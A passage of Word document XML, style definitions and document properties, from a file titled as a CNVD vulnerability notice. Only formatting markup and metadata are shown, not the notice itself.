    <w:name w:val="页脚 字符"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="标题 2 字符"/>
    <w:qFormat/>
    <w:uiPriority w:val="9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24">
    <w:name w:val="批注框文本 字符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标题 1 字符"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="b1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="m1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="pi1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="t1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="ns1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="tx1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:link w:val="12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33">
    <w:name w:val="headline-content2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="已访问的超链接1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="font_big181"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="apple-style-span"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="文档结构图 字符"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="sub_title"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40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1">
    <w:name w:val="未处理的提及2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2">
    <w:name w:val="明显参考1"/>
    <w:basedOn w:val="16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character" w:customStyle="1" w:styleId="43">
    <w:name w:val="未处理的提及3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4">
    <w:name w:val="标题样式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45">
    <w:name w:val="索引"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans CJK SC"/>
      <w:lang w:val="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="页眉与页脚"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="47">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="48">
    <w:name w:val="无格式表格 11"/>
    <w:basedOn w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi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Mar>
        <w:top w:w="113" w:type="dxa"/>
        <w:bottom w:w="113" w:type="dxa"/>
      </w:tcMar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eversec</Company>
  <Pages>3</Pages>
  <Words>288</Words>
  <Characters>1338</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1394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2017-06-06T09:08:00Z</dcterms:created>
  <dc:creator>lenovo</dc:creator>
  <cp:lastModifiedBy>菀菀</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T03:43:31Z</dcterms:modified>
  <dc:title>国家信息安全漏洞共享平台(CNVD)漏洞通报</dc:title>
  <cp:revision>875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B1A7D96F9EA54B1CB74BBE9C383D5BB4_13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eyJoZGlkIjoiZWJiZTQ5ZjkwYjJkNWNmMGQyM2M1MWZiMGQ4YWUyNDUiLCJ1c2VySWQiOiIyOTA2MzQ4NTgifQ==</vt:lpwstr>
  </property>
</Properties>
</file>